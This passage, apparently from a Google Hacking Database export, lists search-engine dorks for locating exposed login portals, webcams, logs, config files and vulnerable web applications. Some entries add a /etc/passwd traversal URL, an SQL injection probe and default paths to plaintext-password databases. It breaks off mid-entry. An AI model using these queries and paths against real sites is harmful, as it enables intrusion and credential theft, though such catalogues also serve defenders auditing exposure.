[[title]"running: Nucleus v3.1" -.nucleuscms.org -demo[[title]]
[[descr]Multiple unspecified vulnerabilities reportedly affect Nucleus CMS. A remote attacker may leverage these issues to steal cookie-based authentication credentials, reveal sensitive data and corrupt database contents.
http://www.securityfocus.com/bid/11631[descr]]
[[url]http://www.google.com/search?q=%22running%3A+Nucleus+v3.1%22+-.nucleuscms.org+-demo[url]]
[[dork]"running: Nucleus v3.1" -.nucleuscms.org -demo[dork]]
[end][788]]
[[start][789]
[[title]"driven by: ASP Message Board"[title]]
[[descr]Multiple unspecified vulnerabilities reportedly affect the Infusium ASP Message Board. A remote attacker may leverage these issues to steal cookie-based authentication credentials, reveal sensitive data and corrupt database contents.
vulnerable Infuseum ASP Message Board 2.2.1 c
Adding the 2.2.1c seems to filter out some good positives, so I left it out.[descr]]
[[url]http://www.google.com/search?q=%22driven+by%3A+ASP+Message+Board%22[url]]
[[dork]"driven by: ASP Message Board"[dork]]
[end][789]]
[[start][791]
[[title]"intitle:Cisco Systems, Inc. VPN 3000 Concentrator"[title]]
[[descr]The Cisco VPN 3000 Concentrator is a remote access VPN.
The 'Concentrator' is a piece of hardware that manages a companies VPN's.
This google dork searches for the Concentrators login portal for remote access. With the correct username and password an attacker can '0wn' their Concentrator; i.e. be able to delete, copy, read, configure anything on the Concentrator.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22intitle%3ACisco+Systems%2C+Inc.+VPN+3000+Concentrator%22&btnG=Search[url]]
[[dork]"intitle:Cisco Systems, Inc. VPN 3000 Concentrator"[dork]]
[end][791]]
[[start][793]
[[title]ext:asp inurl:DUgallery intitle:"3.0" -site:dugallery.com -site:duware.com[[title]]
[[descr]The MS access database can be downloaded from inside the docroot. The user table holds the admin password in plain text. Possible locations for the dugallery database are:
http://xx/.../DUgallery/database/dugallery.mdb
http://xx/.../DUgallery//_private/DUgallery.mdb
http://www.securitytracker.com/alerts/2004/Nov/1012201.html[descr]]
[[url]http://www.google.com/search?num=100&hl=en&safe=off&q=ext%3Aasp+inurl%3ADUgallery+intitle%3A%223.0%22+-site%3Adugallery.com+-site%3Aduware.com&btnG=Search[url]]
[[dork]ext:asp inurl:DUgallery intitle:"3.0" -site:dugallery.com -site:duware.com[dork]]
[end][793]]
[[start][794]
[[title]ext:asp "powered by DUForum" inurl:(messages|details|login|default|register) -site:duware.com[[title]]
[[descr]DUForum is one of those free forum software packages. The database location is determined by the config file "connDUforumAdmin.asp", but the installation instructions don't recommend changing it. Ouch..
Database location is: http://server/duforum/_private/DUforum.mdb[descr]]
[[url]http://www.google.com/search?hl=en&q=ext%3Aasp+%22powered+by+DUForum%22+inurl%3A%28messages%7Cdetails%7Clogin%7Cdefault%7Cregister%29+-site%3Aduware.com[url]]
[[dork]ext:asp "powered by DUForum" inurl:(messages|details|login|default|register) -site:duware.com[dork]]
[end][794]]
[[start][795]
[[title]intext:"enable secret 5 $"[title]]
[[descr]Sometimes people make mistakes and post their cisco configs on "help sites" and don't edit the sensitive fields first. Don't forget to also query Google Groups for this string.[descr]]
[[url]http://www.google.com/search?hl=en&q=intext%3A%22enable+secret+5+%24%22[url]]
[[dork]intext:"enable secret 5 $"[dork]]
[end][795]]
[[start][796]
[[title]inurl:postfixadmin intitle:"postfix admin" ext:php[[title]]
[[descr]Postfix Admin login pages. Duh.[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3Apostfixadmin+intitle%3A%22postfix+admin%22+ext%3Aphp[url]]
[[dork]inurl:postfixadmin intitle:"postfix admin" ext:php[dork]]
[end][796]]
[[start][797]
[[title]ext:cgi inurl:editcgi.cgi inurl:file=[[title]]
[[descr]This was inspired by the K-Otic report. Only two results at time of writing. The cgi script lets you view any file on the system, including /etc/.. (guess it ;)
http://www.k-otik.com/exploits/08242004.Axis.sh.php[descr]]
[[url]http://www.google.com/search?q=ext%3Acgi+inurl%3Aeditcgi.cgi+inurl%3Afile%3D[url]]
[[dork]ext:cgi inurl:editcgi.cgi inurl:file=[dork]]
[end][797]]
[[start][798]
[[title]inurl:axis-cgi[[title]]
[[descr]Just another search string to detect the infamous Axis netcams. This company actually changed the generic /cgi-bin/ directory name to /axis-cgi/, making it easier to d0rk them ;)[descr]]
[[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=inurl%3Aaxis-cgi[url]]
[[dork]inurl:axis-cgi[dork]]
[end][798]]
[[start][799]
[[title]filetype:ns1 ns1[[title]]
[[descr]Netstunbler files contain information about the wireless network. For a cleanup add stuff like: +"Creator" +"Format" +"DateGMT".[descr]]
[[url]http://www.google.com/search?hl=en&q=filetype%3Ans1+ns1[url]]
[[dork]filetype:ns1 ns1[dork]]
[end][799]]
[[start][800]
[[title]"Starting SiteZAP 6.0"[title]]
[[descr]SiteZap webcams ![descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Starting+SiteZAP+6.0%22[url]]
[[dork]"Starting SiteZAP 6.0"[dork]]
[end][800]]
[[start][802]
[[title]filetype:config web.config -CVS[[title]]
[[descr]Through Web.config an IIS adminstrator can specify settings like custom 404 error pages, authentication and authorization settings for the Web site.
This file can hold a plaintext password in the worst case or just reveil the full path info on a 404 error.[descr]]
[[url]http://www.google.com/search?hl=en&q=filetype%3Aconfig+web.config+-CVS[url]]
[[dork]filetype:config web.config -CVS[dork]]
[end][802]]
[[start][803]
[[title]filetype:myd myd -CVS[[title]]
[[descr]MySQL stores its data for each database in individual files with the extension MYD.
An attacker can copy these files to his machine and using a tool like 'strings' possibly view the contents of the database.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=++filetype%3Amyd+myd+-CVS&btnG=Search[url]]
[[dork] filetype:myd myd -CVS[dork]]
[end][803]]
[[start][804]
[[title]filetype:myi myi -CVS[[title]]
[[descr]MySQL stores its data for each database in individual files with the extension MYI.
An attacker can copy these files to his machine and using a tool like 'strings' possibly view the contents of the database.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=filetype%3Amyi+myi+-CVS&btnG=Search[url]]
[[dork]filetype:myi myi -CVS[dork]]
[end][804]]
[[start][805]
[[title]"Obtenez votre forum Aztek" -site:forum-aztek.com[[title]]
[[descr]Atztek Forum is a french forum system. Aztek Forum is reported prone to multiple input validation vulnerabilities. These issues may allow an attacker to carry out cross-site scripting and possibly other attacks.
http://www.securityfocus.com/bid/11654[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][805]]
[[start][806]
[[title]intext:("UBB.threads™ 6.2"|"UBB.threads™ 6.3") intext:"You * not logged *" -site:ubbcentral.com[[title]]
[[descr]UBB.Threads 6.2.*-6.3.* one char bruteforce vulnerability:
http://www.k-otik.com/exploits/20041116.r57ubb.pl.php
[descr]]
[[url]http://www.google.com/search?num=100&q=intext%3A%28%22UBB.threads%E2%84%A2+6.2%22%7C%22UBB.threads%E2%84%A2+6.3%22%29+intext%3A%22You+*+not+logged+*%22+-site%3Aubbcentral.com[url]]
[[dork]intext:("UBB.threadsâ„¢ 6.2"|"UBB.threadsâ„¢ 6.3") intext:"You * not logged *" -site:ubbcentral.com[dork]]
[end][806]]
[[start][807]
[[title]inurl:/SiteChassisManager/[[title]]
[[descr]Unknown SQL injection and XSS vulnerabilities in DMXReady Site Chassis Manager.
http://www.securityfocus.com/bid/11434/discussion/[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3A%2FSiteChassisManager%2F+&btnG=Search[url]]
[[dork]inurl:/SiteChassisManager/ [dork]]
[end][807]]
[[start][808]
[[title]"Powered by Land Down Under 601"[title]]
[[descr]SQL injection vulnerability in Land Down Under 601 could give an attacker administrative access. An exploit exists on the internet, search google.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+Land+Down+Under+601%22[url]]
[[dork]"Powered by Land Down Under 601"[dork]]
[end][808]]
[[start][809]
[[title]intitle:"EvoCam" inurl:"webcam.html"[title]]
[[descr]Evocams ![descr]]
[[url]http://www.google.com/search?q=intitle:%22EvoCam%22+inurl:%22webcam.html%22&hl=en&lr=&c2coff=1&start=0&sa=Nurl[url]]
[[dork]intitle:"EvoCam" inurl:"webcam.html"[dork]]
[end][809]]
[[start][810]
[[title]inurl:directorypro.cgi[[title]]
[[descr]A security vulnerability in the product allows attackers to perform a directory traversal attack and access files that reside outside the normal HTTP root directory.
http://target/cgi-bin/directorypro.cgi?want=showcat&show=../../../../etc/passwd%00
http://www.securityfocus.com/bid/2793
[descr]]
[[url]http://www.google.com/search?q=inurl%3Adirectorypro.cgi[url]]
[[dork]inurl:directorypro.cgi[dork]]
[end][810]]
[[start][811]
[[title]intitle:"PhpMyExplorer" inurl:"index.php" -cvs[[title]]
[[descr]PhpMyExplorer is a PHP application that allows you to easily update your site online without any FTP access. A security vulnerability in the product allows attackers to view and read files that reside outside the normal bound directory.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22PhpMyExplorer%22+inurl%3A%22index.php%22+-cvs[url]]
[[dork]intitle:"PhpMyExplorer" inurl:"index.php" -cvs[dork]]
[end][811]]
[[start][812]
[[title]inurl:cal_make.pl[[title]]
[[descr]A security vulnerability in PerlCal allows remote attackers to access files that reside outside the normally bounding HTML root directory.
http://www.securityfocus.com/bid/2663[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3Acal_make.pl&btnG=Search[url]]
[[dork]inurl:cal_make.pl[dork]]
[end][812]]
[[start][813]
[[title]inurl:/webedit.* intext:WebEdit Professional -html[[title]]
[[descr]WebEdit is a content management system. This is the login portal search.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3A%2Fwebedit.*+intext%3AWebEdit+Professional+-html[url]]
[[dork]inurl:/webedit.* intext:WebEdit Professional -html[dork]]
[end][813]]
[[start][814]
[[title]intitle:"CGIWrap Error: *"[title]]
[[descr]CGIWrap error pages.
CGIWrap is a gateway program that allows general users to use CGI scripts and HTML forms without compromising the security of the http server.
These pages reveal some information depending on the error message. This can be
* usernames
* path and filenames
* wrong script permission! "Script is group writable."
[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][814]]
[[start][815]
[[title]intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)[[title]]
[[descr]The Apache::Status returns information about the server software, operating system, number of child processes and current visitors. The official documentation can be found at hxxp://search.cpan.org/~gozer/mod_perl-1.29/lib/Apache/Status.pm[descr]]
[[url]http://www.google.com/search?q=intitle:%22Apache::Status%22+(inurl:server-status+%7C+inurl:status.html+%7C+inurl:apache.html)&num=100[url]]
[[dork]intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)[dork]]
[end][815]]
[[start][818]
[[title]"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log[[title]]
[[descr]This file spills a lot of juicy info... in some cases, passwords in the raw dump, but not in any I've found this time around. However, with a computer name, a user name, and various other nuggets of info, this one file seems to sketch the system pretty well.[descr]]
[[url]http://www.google.com/search?q=%22Microsoft+%28R%29+Windows+*+%28TM%29+Version+*+DrWtsn32+Copyright+%28C%29%22+ext%3Alog[url]]
[[dork]"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log[dork]]
[end][818]]
[[start][819]
[[title]"Powered by PowerPortal v1.3"[title]]
[[descr]PowerPortal is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query.
PowerPortal 1.3 is reported prone to this vulnerability, however, it is possible that other versions are affected as well. An example URI sufficient to exploit this vulnerability has been provided: http://www.example.com/pp13/index.php?index_page=and 1=1
http://www.securityfocus.com/bid/11681[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Powered+by+PowerPortal+v1.3%22[url]]
[[dork]"Powered by PowerPortal v1.3"[dork]]
[end][819]]
[[start][820]
[[title]inurl:report "EVEREST Home Edition "[title]]
[[descr]Well what can be said about this one, I've added it to the DB under Juicy info, however it could have easilly gone under virtually any of the lists as it just give out Soooo much info.
I can for instance find out the admin username (not just the adin every user) and also if it password protected and if the password ever expires plus is it a current user account, also do the same for any guest accounts, Ok nice and easy how about the O/S and all the Mapped Drive locations all there along with installed software and even currently running applications and processes. Site admins would have to be mad to leave this stuff open, but as we all know from the GHDB Site admins do weird and funny stuff.
This one just gives out to much to list, so go have a look and see what you can find.[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][820]]
[[start][821]
[[title]"powered by minibb" -site:www.minibb.net -intext:1.7f[[title]]
[[descr]miniBB is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query.
miniBB versions prior to 1.7f are reported prone to this issue.
http://www.securityfocus.com/bid/11688[descr]]
[[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&q=%22powered+by+minibb%22+%2Dsite%3Awww%2Eminibb%2Enet+%2Dintext%3A1%2E7f[url]]
[[dork]"powered by minibb" -site:www.minibb.net -intext:1.7f[dork]]
[end][821]]
[[start][824]
[[title]"Powered by Dudirectory" -site:duware.com[[title]]
[[descr]Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL.
For DuDirectory it's: /dudirectory/_private/dudirectory.mdb[descr]]
[[url]http://www.google.com/search?num=100&&q=%22Powered+by+Dudirectory%22+-site%3Aduware.com[url]]
[[dork]"Powered by Dudirectory" -site:duware.com[dork]]
[end][824]]
[[start][825]
[[title]"powered by ducalendar" -site:duware.com[[title]]
[[descr]Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL.
For Ducalendar it's: /ducalendar/_private/ducalendar.mdb[descr]]
[[url]http://www.google.com/search?num=100&q=%22powered+by+ducalendar%22+-site%3Aduware.com[url]]
[[dork]"powered by ducalendar" -site:duware.com[dork]]
[end][825]]
[[start][826]
[[title]"Powered by Duclassified" -site:duware.com[[title]]
[[descr]Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL.
For Duclassified it's: /duclassified/_private/duclassified.mdb[descr]]
[[url]http://www.google.com/search?num=100&q=%22Powered+by+Duclassified%22+-site%3Aduware.com[url]]
[[dork]"Powered by Duclassified" -site:duware.com[dork]]
[end][826]]
[[start][827]
[[title]"Powered by Duclassified" -site:duware.com "DUware All Rights reserved"[title]]
[[descr]Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL.
For Duclassified it's: /duclassified/_private/duclassified.mdb[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+Duclassified%22+-site%3Aduware.com+%22DUware+All+Rights+Reserved%22&btnG=Search[url]]
[[dork]"Powered by Duclassified" -site:duware.com "DUware All Rights Reserved"[dork]]
[end][827]]
[[start][828]
[[title]"powered by duclassmate" -site:duware.com[[title]]
[[descr]Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL.
For Duclassmate it's: /duclassmate/_private/duclassmate.mdb[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22powered+by+duclassmate%22+-site%3Aduware.com[url]]
[[dork]"powered by duclassmate" -site:duware.com[dork]]
[end][828]]
[[start][829]
[[title]intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com[[title]]
[[descr]Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL.
For Dupics rename location to ../_private/dupics.mdb [descr]]
[[url]http://www.google.com/search?num=100&q=intitle%3Adupics+inurl%3A%28add.asp+%7C+default.asp+%7C+view.asp+%7C+voting.asp%29+-site%3Aduware.com[url]]
[[dork]intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com[dork]]
[end][829]]
[[start][830]
[[title]"powered by dudownload" -site:duware.com[[title]]
[[descr]Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL.
rename ../xxx to ../_private/dudownload.mdb [descr]]
[[url]http://www.google.com/search?num=100&q=%22powered+by+dudownload%22+-site%3Aduware.com[url]]
[[dork]"powered by dudownload" -site:duware.com[dork]]
[end][830]]
[[start][831]
[[title]intitle:"ipcop - main"[title]]
[[descr]IPCop Firewall is a Linux firewall for home and SOHO users. IPCop can be managed from a simple web interface (which can be found and managed by Google Hackers ;)[descr]]
[[url]http://www.google.com/search?q=intitle:%22ipcop+-+main%22&filter=0[url]]
[[dork]intitle:"ipcop - main"[dork]]
[end][831]]
[[start][832]
[[title]intitle:"Smoothwall Express" inurl:cgi-bin "up * days"[title]]
[[descr]Smoothwall is a firewall operating system distribution based on Linux. (Not many results for this search at the moment). [descr]]
[[url]http://www.google.com/search?q=intitle%3A%22Smoothwall+Express%22+inurl%3Acgi-bin+%22up+*+days%22[url]]
[[dork]intitle:"Smoothwall Express" inurl:cgi-bin "up * days"[dork]]
[end][832]]
[[start][833]
[[title]filetype:php HAXPLORER "Server Files Browser"[title]]
[[descr]Haxplorer is a webbased filemanager which enables the user to browse files on the webserver. You can rename, delete, copy, download and upload files.
As the script's name says it is mostly installed by hackers
[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=filetype%3Aphp+HAXPLORER+%22Server+Files+Browser%22&btnG=Search[url]]
[[dork]filetype:php HAXPLORER "Server Files Browser"[dork]]
[end][833]]
[[start][834]
[[title]inurl:coranto.cgi intitle:Login (Authorized Users Only)[[title]]
[[descr]Coranto is one of the most powerful Content Management System (CMS) available on the market. It is a freeware product written in Perl and it can help the development and streamlining of your site(s). It is written to be a multiuser environment for posting news articles on a web site, it supports multiple browsers, multiple operating systems, produces standard compliant html, has a huge variety of excellent features and is fully extendible via addons. It is free for use on any site, personal or commercial![descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Acoranto.cgi+intitle%3ALogin+%28Authorized+Users+Only%29[url]]
[[dork]inurl:coranto.cgi intitle:Login (Authorized Users Only)[dork]]
[end][834]]
[[start][835]
[[title] filetype:log intext:"ConnectionManager2"[title]]
[[descr]ISDNPM 3.x for OS/2-Dialer log files.
These files contain sensitive info like ip addresses, phone numbers of dial in servers, usernames and password hashes - Everything you need to dial in....[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][835]]
[[start][836]
[[title]intext:"Videoconference Management System" ext:htm[[title]]
[[descr]Tandberg video conferencing appliances
The webinterface enables you to drop calls and to browse the internal phonebook
[descr]]
[[url]http://www.google.com/search?q=intext:%22Videoconference+Management+System%22+ext:htm&hl=en&lr=&c2coff=1&start=0&sa=N[url]]
[[dork]intext:"Videoconference Management System" ext:htm[dork]]
[end][836]]
[[start][837]
[[title]ext:txt "Final encryption key"[title]]
[[descr]IPSec debug/log data which contains user data and password hashes.
Can be used to crack passwords.[descr]]
[[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=ext%3Atxt+%22Final+encryption+key%22+&btnG=Search[url]]
[[dork]ext:txt "Final encryption key" [dork]]
[end][837]]
[[start][838]
[[title]ext:log "Final encryption key"[title]]
[[descr]IPSec debug/log data which contains user data and password hashes.
Can be used to crack passwords[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][838]]
[[start][839]
[[title]filetype:log "See `ipsec --copyright"[title]]
[[descr]BARF log files
Man page:
Barf outputs (on standard output) a collection of debugging information (contents of files, selections from logs, etc.) related to the IPSEC encryption/authentication system. It is primarily a convenience for remote debugging, a single command which packages up (and labels) all information that might be relevant to diagnosing a problem in IPSEC.[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][839]]
[[start][840]
[[title]intitle:"Welcome To Xitami" -site:xitami.com[[title]]
[[descr]Default Xitami installation
Additionally every default installation of Xitami webserver has a testscript which provides a lot of information about the server.
It can be run by entering the following url
http://server/cgialias/testcgi.exe
(cgialias = is usually /cgi-bin/)[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22Welcome+To+Xitami%22+-site%3Axitami.com&btnG=Google+Search[url]]
[[dork]intitle:"Welcome To Xitami" -site:xitami.com[dork]]
[end][840]]
[[start][841]
[[title]inurl:testcgi xitami[[title]]
[[descr]Testpage / webserver environment
This is the test cgi for xitami webserver. It shows the webserver's complete environment. Contains very interesting information which can be used a first step into the server.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Atestcgi+xitami&btnG=Search[url]]
[[dork]inurl:testcgi xitami[dork]]
[end][841]]
[[start][842]
[[title] intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu[[title]]
[[descr]Some companies use a Xerox Product called DocuShare. The problem with this is by default guest access is enabled and it appears a lot of companies either don't care or don't know.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22DocuShare%22+inurl%3A%22docushare%2Fdsweb%2F%22+-faq+-gov+-edu[url]]
[[dork]intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu[dork]]
[end][842]]
[[start][843]
[[title]intext:"Powered By: TotalIndex" intitle:"TotalIndex"[title]]
[[descr]TotalIndex v2.0 is an open source script that is designed to replace the simple, and boring default index page of a site which lists the files in an indexed folder. It's not PW protected so an attacker can browse the files and take what they want.[descr]]
[[url]http://www.google.com/search?hl=en&q=intext%3A%22Powered+By%3A+TotalIndex%22+intitle%3A%22TotalIndex%22[url]]
[[dork]intext:"Powered By: TotalIndex" intitle:"TotalIndex"[dork]]
[end][843]]
[[start][844]
[[title]inurl:"GRC.DAT" intext:"password"[title]]
[[descr]Symantec Norton Anti-Virus Corporate Edition data file containing encrypted passwords.[descr]]
[[url]http://www.google.com/search?q=inurl%3A%22GRC.DAT%22+intext%3A%22password%22[url]]
[[dork]inurl:"GRC.DAT" intext:"password"[dork]]
[end][844]]
[[start][845]
[[title]inurl:php.exe filetype:exe -example.com[[title]]
[[descr]It is possible to read any file remotely on the server with PHP.EXE (assuming a script alias for it is enabled), even across drives. (Note: The GHDB has another search for this file based on directorly listings, try them both)[descr]]
[[url]http://www.google.com/search?q=inurl%3Aphp.exe+filetype%3Aexe+-example.com[url]]
[[dork]inurl:php.exe filetype:exe -example.com[dork]]
[end][845]]
[[start][846]
[[title]intitle:"PHP Advanced Transfer" inurl:"login.php"[title]]
[[descr]PHP Advacaned Transfer is GPL'd software that claims to be the "The ultimate PHP download & upload manager". This is a search for the login pages.[descr]]
[[url]http://www.google.com/search?num=50&q=intitle%3A%22PHP+Advanced+Transfer%22+inurl%3A%22login.php%22[url]]
[[dork]intitle:"PHP Advanced Transfer" inurl:"login.php"[dork]]
[end][846]]
[[start][847]
[[title]intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )[[title]]
[[descr]PHP Advacaned Transfer is GPL'd software that claims to be the "The ultimate PHP download & upload manager". This is a search for the main and recently changed files pages.[descr]]
[[url]http://www.google.com/search?num=100&q=intitle%3A%22PHP+Advanced+Transfer%22+%28inurl%3Aindex.php+%7C+inurl%3Ashowrecent.php+%29[url]]
[[dork]intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )[dork]]
[end][847]]
[[start][848]
[[title]"Output produced by SysWatch *"[title]]
[[descr]SysWatch is a CGI to display current information about your UNIX system. It can display drive partitions, disk or drive usage, as well as resource hogs (running processes) and last but not lease it shows what current users are doing online (including sh scripts etc..). [descr]]
[[url]http://www.google.com/search?num=200&q=%22Output+produced+by+SysWatch+*%22[url]]
[[dork]"Output produced by SysWatch *"[dork]]
[end][848]]
[[start][849]
[[title]PHPKonsole PHPShell filetype:php -echo[[title]]
[[descr]PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver. When you run commands they will run as the webservers UserID. This should work perfectly for managing files, like moving, copying etc. If you're using a linux server, system commands such as ls, mv and cp will be available for you...
[descr]]
[[url]http://www.google.com/search?q=PHPKonsole+PHPShell++filetype%3Aphp+-echo[url]]
[[dork]PHPKonsole PHPShell filetype:php -echo[dork]]
[end][849]]
[[start][850]
[[title]"Phorum Admin" "Database Connection" inurl:forum inurl:admin[[title]]
[[descr]Phorum admin pages
This either shows Information leakage (path info) or it shows Unprotected Admin pages.[descr]]
[[url]http://www.google.com/search?num=20&q=%22Phorum+Admin%22+%22Database+Connection%22+inurl%3Aforum+inurl%3Aadmin[url]]
[[dork]"Phorum Admin" "Database Connection" inurl:forum inurl:admin[dork]]
[end][850]]
[[start][851]
[[title]"Warning: mysql_query()" "invalid query"[title]]
[[descr]MySQL query errors revealing database schema and usernames.
[descr]]
[[url]http://www.google.com/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=%22Warning%3A+mysql_query%28%29%22+%22invalid+query%22&btnG=Search[url]]
[[dork]"Warning: mysql_query()" "invalid query"[dork]]
[end][851]]
[[start][852]
[[title]inurl:"/cgi-bin/loadpage.cgi?user_id="[title]]
[[descr]Description:
EZshopper is a full-featured shopping cart program.
loadpage.cgi of EZshopper allows Directory Traversal
http://www.securityfocus.com/bid/2109
[descr]]
[[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=inurl%3A%22%2Fcgi-bin%2Floadpage.cgi%3Fuser_id%3D%22&btnG=Google-Suche&meta=[url]]
[[dork]inurl:"/cgi-bin/loadpage.cgi?user_id="[dork]]
[end][852]]
[[start][853]
[[title]inurl:"ipp/pdisplay.htm"[title]]
[[descr]Providing a standout printing solution, Novell iPrint offers secure print services that extend across multiple networks and operating systems—bringing the power of the Net to your business environment. This search locates various online printers.[descr]]
[[url]http://www.google.com/search?q=inurl%3A%22ipp%2Fpdisplay.htm%22[url]]
[[dork]inurl:"ipp/pdisplay.htm"[dork]]
[end][853]]
[[start][854]
[[title]filetype:mdb inurl:"news/news"[title]]
[[descr]Web Wiz Site News unprotected database holds config and admin information in a microsoft access database in news/news.mdb. This information is almost always unprotected. [descr]]
[[url]http://www.google.com/search?q=filetype:mdb+inurl:%22news/news%22[url]]
[[dork]filetype:mdb inurl:"news/news"[dork]]
[end][854]]
[[start][855]
[[title]intitle:"View Img" inurl:viewimg.php[[title]]
[[descr]It is reported that the 'viewing.php' script does not properly validate user-supplied input in the 'path' variable. A remote user can submit a specially crafted URL to view a list of files within an arbitrary directory. See http://securitytracker.com/alerts/2004/Nov/1012312.html for more information.
[descr]]
[[url]http://www.google.com/search?q=intitle:%22View+Img%22+inurl:viewimg.php[url]]
[[dork]intitle:"View Img" inurl:viewimg.php[dork]]
[end][855]]
[[start][856]
[[title]intitle:"Resin Default Home Page"[title]]
[[descr]Resin provides a fast standalone web server. This search locates those servers based on the title of the default page.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22Resin+Default+Home+Page%22[url]]
[[dork]intitle:"Resin Default Home Page"[dork]]
[end][856]]
[[start][857]
[[title]intext:"Storage Management Server for" intitle:"Server Administration"[title]]
[[descr]These pages can reveal information about the operating system and patch level, as well as providing a login portal for hackers to attack. "As part of the IBM TotalStorage® Open Software Family, IBM Tivoli Storage (ADSM) Manager protects your organization's data from hardware failures and other errors by storing backup and archive copies of data on offline storage." [descr]]
[[url]http://www.google.com/search?q=intext:%22Storage+Management+Server+for%22+intitle:%22Server+Administration%22[url]]
[[dork]intext:"Storage Management Server for" intitle:"Server Administration"[dork]]
[end][857]]
[[start][858]
[[title] filetype:pl -intext:"/usr/bin/perl" inurl:webcal (inurl:webcal | inurl:add | inurl:delete | inurl:config)[[title]]
[[descr]WebCal allows you to create and maintain an interactive events calendar or scheduling system on your Web site. The file names explain themselves, but don't abuse the faulty admins.[descr]]
[[url]http://www.google.com/search?num=100&q=filetype%3Apl+-intext%3A%22%2Fusr%2Fbin%2Fperl%22+inurl%3Awebcal+%28inurl%3Awebcal+%7C+inurl%3Aadd+%7C+inurl%3Adelete+%7C+inurl%3Aconfig%29[url]]
[[dork]filetype:pl -intext:"/usr/bin/perl" inurl:webcal (inurl:webcal | inurl:add | inurl:delete | inurl:config)[dork]]
[end][858]]
[[start][859]
[[title]site:ups.com intitle:"Ups Package tracking" intext:"1Z ### ### ## #### ### #"[title]]
[[descr]Ever use the UPS Automated Tracking Service?? Wanna see where packages are going? Want to Man-in-the-middle their delivery? Well, then here it is.
-Digital Spirit[descr]]
[[url]http://www.google.com/search?hl=en&lr=&safe=off&q=site%3Aups.com+intitle%3A%22Ups+Package+tracking%22+intext%3A%221Z+%23%23%23+%23%23%23+%23%23+%23%23%23%23+%23%23%23+%23%22&btnG=Search[url]]
[[dork]site:ups.com intitle:"Ups Package tracking" intext:"1Z ### ### ## #### ### #"[dork]]
[end][859]]
[[start][860]
[[title]intitle:"twiki" inurl:"TWikiUsers"[title]]
[[descr]TWiki has many security problems, depeding on the version installed. TWiki, is a flexible, powerful, and easy to use enterprise collaboration platform. It is a structured Wiki, typically used to run a project development space, a document management system, a knowledge base, or any other groupware tool, on an intranet or on the internet. Web content can be created collaboratively by using just a browser. Developers can create new web applications based on a Plugin API.
[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22twiki%22+inurl%3A%22TWikiUsers%22[url]]
[[dork]intitle:"twiki" inurl:"TWikiUsers"[dork]]
[end][860]]
[[start][861]
[[title]+"Powered by Invision Power Board v2.0.0..2"[title]]
[[descr]A remote SQL injection vulnerability affects Inivision Power Board. This issue is due to a failure of the application to properly validate user-supplied input prior to using it in an SQL query.
